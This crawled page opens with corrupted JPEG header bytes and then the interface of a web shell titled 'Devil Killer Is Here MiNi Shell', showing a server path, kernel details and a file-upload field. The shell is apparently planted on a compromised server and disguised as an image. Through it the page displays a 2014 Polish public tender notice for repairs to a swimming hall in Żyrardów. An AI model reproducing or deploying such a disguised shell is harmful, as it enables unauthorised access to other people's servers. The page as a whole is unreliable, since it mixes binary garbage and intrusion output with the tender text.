JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140109/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140109/9642-N-2014.html

<p class="kh_header"><b>Żyrardów: Usunięcie usterek w hali basenowej z zapleczem w kompleksie sportowo - rekreacyjnym w Żyrardowie przy ul. Stefana Jodłowskiego 25/27 z podziałem na 3 części</b><br>
<b>Numer ogłoszenia: 9642 - 2014; data zamieszczenia: 09.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Aqua Żyrardów" Spółka z o.o. , ul. Stefana Jodłowskiego 25/27, 96-300 Żyrardów, woj. mazowieckie, tel. 46 854 16 46 wew. 100, faks 46 854 16 46 wew. 100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://aqua.bip.eur.pl/public/</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usunięcie usterek w hali basenowej z zapleczem w kompleksie sportowo - rekreacyjnym w Żyrardowie przy ul. Stefana Jodłowskiego 25/27 z podziałem na 3 części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usunięcie usterek w hali basenowej z zapleczem          w  kompleksie sportowo - rekreacyjnym w Żyrardowie przy ul. Stefana Jodłowskiego 25/27. 
CZĘŚĆ 1 - usunięcie usterek opisanych poniżej, zgodnie z dokumentacją rysunkową:
1.1 Naprawa istniejącego pokrycia dachu - pkt 1 wg dokumentacji rysunkowej.
1.2 Usunięcie skutków i przyczyn przenikania wilgoci na uskoku dachu-oknie między nieckami basenu oraz okap od strony północnej na całej długości osi R. - pkt 2 wg dokumentacji rysunkowej.
1.3 Likwidacja mostków termicznych okapów - pkt 3 i 4 wg dokumentacji rysunkowej.
1.4 Wymiana kanałów wentylacji wywiewnej w okapach - pkt 5 wg dokumentacji rysunkowej.
1.4.1 Roboty demontażowe. 
1.4.2 Roboty instalacyjne. 
1.5 Naprawa istniejącego pokrycia dachu wieży zjeżdżalni - pkt 6 wg dokumentacji rysunkowej. 
CZĘŚĆ 2 - usunięcie usterek opisanych poniżej, zgodnie z dokumentacją rysunkową:
1.7 Likwidacja pęknięcia poziomego muru - pkt 8 wg dokumentacji rysunkowej. 
1.8 Naprawa pęknięć-rys ścian w hali basenowej w klatkach schodowych, pomieszczeniach magazynowych, szatniach, korytarzach.
1.9 Naprawa pęknięć - rys w pomieszczeniach pod basenowych - korytarze, magazyny, wentylatorownia - pkt 10 wg dokumentacji rysunkowej.
1.10 Usunięcie przecieków pod fasadami w części nad trybunami - pkt 11 wg dokumentacji rysunkowej. 
1.11 Konserwacja stężeń połaciowych.
1.12 Wymiana odchodzących płytek na obudowach kanałów wentylacyjnych w hali basenowej oraz pod oknami okrągłymi przy jacuzzi - pkt 16 wg dokumentacji rysunkowej.
1.13 Uzupełnienie fugi między płytkami w części mokrej-hala basenowa, natryski - pkt 17 wg dokumentacji rysunkowej. 
CZĘŚĆ 3 - usunięcie usterek opisanych poniżej, zgodnie z dokumentacją rysunkową:
1.6 Doszczelnienie fasad i docieplenie ściany - pkt 7 i 14 wg dokumentacji rysunkowej. 
1.14 Naprawa fugi na ścianie zjeżdżalni - pkt 20 wg dokumentacji rysunkowej. 
1.15 Umocowanie parapetów zewnętrznych - pkt 22 wg dokumentacji rysunkowej. 
1.16 Zdemontowanie obicia z płyt na dźwigarach z drewna klejonego oraz zabezpieczenie drewna - pkt 23 wg dokumentacji rysunkowej.
1.17Oczyszczenie i impregnacja ścian z cegły klinkierowych - pkt 26 wg dokumentacji rysunkowej. 
1.18 Przełożenie opaski wokół budynku.
2. Z uwagi na charakter prac, prace mogą być prowadzone w trakcie funkcjonowania obiektu bądź mogą wymagać jego zamknięcia. Pływalnia czynna jest codziennie w godz. od 7:00 do 22:00. W uzasadnionych przypadkach dopuszcza się prowadzenie prac w godzinach nocnych. Dopuszcza się zamkniecie obiektu w terminie uzgodnionym, w ilości dni niezbędnej do wykonania robót, które wymagają zamknięcia obiektu. Harmonogramu rzeczowo - finansowy oraz okresy wyłączenia z funkcjonowania obiektu należy ustalić z Zamawiającym.  
3. Kody opisujące przedmiot zamówienia określone we Wspólnym Słowniku Zamówień (CPV): przedmiot główny: kod CPV: 45000000-7 Roboty budowlane.
4. Przedmiot zamówienia, tj. usunięcie usterek w hali basenowej z zapleczem w kompleksie sportowo-rekreacyjnym w Żyrardowie przy ul. Stefana Jodłowskiego 25/27 należy wykonać zgodnie z dokumentacją rysunkową, którą stanowi załącznik nr 8 do SIWZ. 
5. Dokumentacja projektowa, na podstawie której wybudowany został obiekt znajduje się do wglądu w siedzibie Spółki.
6. Przedmiar robót stanowi załącznik nr 9 do SIWZ. Jest to materiał pomocniczy do wyceny zamówienia. 
7. Zamawiający ZALECA przeprowadzenie wizji lokalnej w obiekcie przed złożeniem oferty, celem potwierdzenia zakresu przedmiotu zamówienia. Wizja lokalna będzie możliwa po uprzednim, pisemnym zgłoszeniu Wykonawcy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda od wykonawców wniesienia wadium w następujących wysokościach:
Dla Części 1: 3 800,00 PLN 
Dla Części 2: 1 800,00 PLN 
Dla Części 3:  600,00 PLN 
2.Wadium wnosi się przed upływem terminu składania ofert.
3.Wadium może być wnoszone w jednej lub kilku następujących formach:
1)pieniądzu,
2)w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)gwarancjach bankowych,
4)gwarancjach ubezpieczeniowych,
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 Ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 późn. zm.).
4.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:
Bank Spółdzielczy w Skierniewicach Filia w Żyrardowie, ul. Łukasińskiego 13               Nr rachunku 35929700050457194620020001 z dopiskiem: wadium - usunięcie usterek, część.Znak postępowania ZP/01/2014. Dowód wniesienia wadium w postaci kserokopii potwierdzonej za zgodność z oryginałem należy dołączyć do oferty. Za termin wniesienia wadium przyjmuje się moment uznania rachunku bankowego zamawiającego.
5.Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. Zamawiający zwraca wadium wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
6.Oferta niezabezpieczona wadium w jednej z ww form zostanie odrzucona bez rozpatrywania, a Wykonawca zostanie wykluczony z postępowania.
7.W przypadku wnoszenia wadium w jednej z pozostałych form niepieniężnych, wadium należy załączyć do oferty w oryginale, a także jego kopię poświadczoną za zgodność z oryginałem przez wykonawcę.
Wadium w formie niepieniężnej musi posiadać okres ważności nie krótszy niż okres związania ofertą, pod rygorem wykluczenia wykonawcy z postępowania</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunku na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust.1 ustawy P. z. p. zgodnie z załącznikiem Nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku dla części 1: Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - Wykonawca w tym okresie zrealizował, co najmniej jedną robotę budowlaną o podobnym charakterze jak w przedmiotowym zamówieniu o wartości robót nie mniejszej niż 200 000,00 PLN brutto. 
Opis sposobu dokonywania oceny spełniania tego warunku dla części 2: Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - Wykonawca w tym okresie zrealizował, co najmniej jedną robotę budowlaną o podobnym charakterze jak w przedmiotowym zamówieniu o wartości robót nie mniejszej niż 100 000,00 PLN brutto. 

Opis sposobu dokonywania oceny spełniania tego warunku dla części 3: Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - Wykonawca w tym okresie zrealizował, co najmniej jedną robotę budowlaną o podobnym charakterze jak w przedmiotowym zamówieniu o wartości robót nie mniejszej niż 30 000,00 PLN brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunku na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust.1 ustawy P. z. p. zgodnie z załącznikiem Nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobą lub osobami z uprawnieniami do kierowania robotami w branży stosownie do zakresu ujętego łącznie lub dla poszczególnych części zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku dla części 1: Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości  co najmniej 200 000,00 zł (słownie: dwieście  tysięcy złotych, 00/100). 

Opis sposobu dokonywania oceny spełniania tego warunku dla części 2: Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości co najmniej 100 000,00 zł (słownie: sto tysięcy złotych, 00/100).                                               

Opis sposobu dokonywania oceny spełniania tego warunku dla części 3: Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości  co najmniej 30 000,00 zł (słownie: trzydzieści tysięcy złotych, 00/100).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Robota budowlana o podobnym charakterze jak w przedmiotowym zamówieniu o wartości robót nie mniejszej niż 200 000,00 PLN brutto- dot. części 1.
Robota budowlana o podobnym charakterze jak w przedmiotowym zamówieniu o wartości robót nie mniejszej niż 100 000,00 PLN brutto- dot. części 2.
Robota budowlana o podobnym charakterze jak w przedmiotowym zamówieniu o wartości robót nie mniejszej niż 30 000,00 PLN brutto- dot. części 3.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Wypełniony formularz cenowy zgodnie z załącznikiem Nr 10 do SIWZ.
b) Dowód wniesienia wadium - kserokopia wpłaty wadium z potwierdzeniem dokonanego w przypadku formy pieniężnej, a w przypadku form niepieniężnych wadium należy załączyć do oferty kopię dokumentu poświadczoną za zgodność z oryginałem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru wykonawcy chyba, że zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w SIWZ oraz określił warunki takiej zmiany. 
2. Na podstawie art. 144 ustawy P. z .p. zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w następujących przypadkach:
  1) zmiany terminu realizacji zamówienia określonego w rozdziale 9 SIWZ w przypadku:
 a)  działania siły wyższej- zdarzenia o charakterze nadzwyczajnym występujące po zawarciu umowy a których strony nie były w stanie przewidzieć w momencie jej zawierania i których zaistnienie i skutki  uniemożliwiają wykonanie umowy w określonym pierwotnym terminie. Strony przewidują możliwość wydłużenia terminu realizacji o okres działania siły wyżej oraz o czas  potrzebny do usunięcia skutków tego działania,
b) wystąpienia klęsk żywiołowych (zalania, powodzie, pożary, itp.) i innych warunków atmosferycznych odbiegających od typowych, uniemożliwiających prowadzenie robót budowlanych i innych prac,
c) z  innych przyczyn niezależnych od stron.
 2)  konieczna zmiana zakresu prac, której nie można było przewidzieć w chwili zawarcia umowy,a uzasadniona jest technologią/ konieczności realizacji robót zamiennych, o ile te nie powodują zmiany wynagrodzenia Wykonawcy3) zaakceptowanej przez Zamawiającego zmiany podwykonawców, którzy zostali wskazani  w ofercie, o ile zmiana podwykonawców odbędzie się zgodnie z art. 647 1 kc.
4) zmiany w przypadku zaistnienia sytuacji, której nie dało się przewidzieć, a jest ona korzystna dla Zamawiającego,
5) w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
6) w przypadku zmiany unormowań prawnych powszechnie obowiązujących.
3. Wszelkie zmiany i uzupełnienia umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://aqua.bip.eur.pl/public/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kompleks sportowo-rekreacyjny, ul. Stefana Jodłowskiego 25/27, 96-300 Żyrardów, sekretariat I- sze piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.01.2014 godzina 12:00, miejsce: Kompleks sportowo-rekreacyjny, ul. Stefana Jodłowskiego 25/27, 96-300 Żyrardów, sekretariat I- sze piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ 1 - Usunięcie usterek, zgodnie z dokumentacją rysunkową:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1 Naprawa istniejącego pokrycia dachu - pkt 1 wg dokumentacji rysunkowej.
1.2 Usunięcie skutków i przyczyn przenikania wilgoci na uskoku dachu-oknie między nieckami basenu oraz okap od strony północnej na całej długości osi R. - pkt 2 wg dokumentacji rysunkowej.
1.3 Likwidacja mostków termicznych okapów - pkt 3 i 4 wg dokumentacji rysunkowej.
1.4 Wymiana kanałów wentylacji wywiewnej w okapach - pkt 5 wg dokumentacji rysunkowej.
1.4.1 Roboty demontażowe. 
1.4.2 Roboty instalacyjne. 
1.5 Naprawa istniejącego pokrycia dachu wieży zjeżdżalni - pkt 6 wg dokumentacji rysunkowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ 2 - Usunięcie usterek, zgodnie z dokumentacją rysunkową:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.7 Likwidacja pęknięcia poziomego muru - pkt 8 wg dokumentacji rysunkowej. 
1.8 Naprawa pęknięć-rys ścian w hali basenowej w klatkach schodowych, pomieszczeniach magazynowych, szatniach, korytarzach.
1.9 Naprawa pęknięć - rys w pomieszczeniach pod basenowych - korytarze, magazyny, wentylatorownia - pkt 10 wg dokumentacji rysunkowej.
1.10 Usunięcie przecieków pod fasadami w części nad trybunami - pkt 11 wg dokumentacji rysunkowej. 
1.11 Konserwacja stężeń połaciowych.
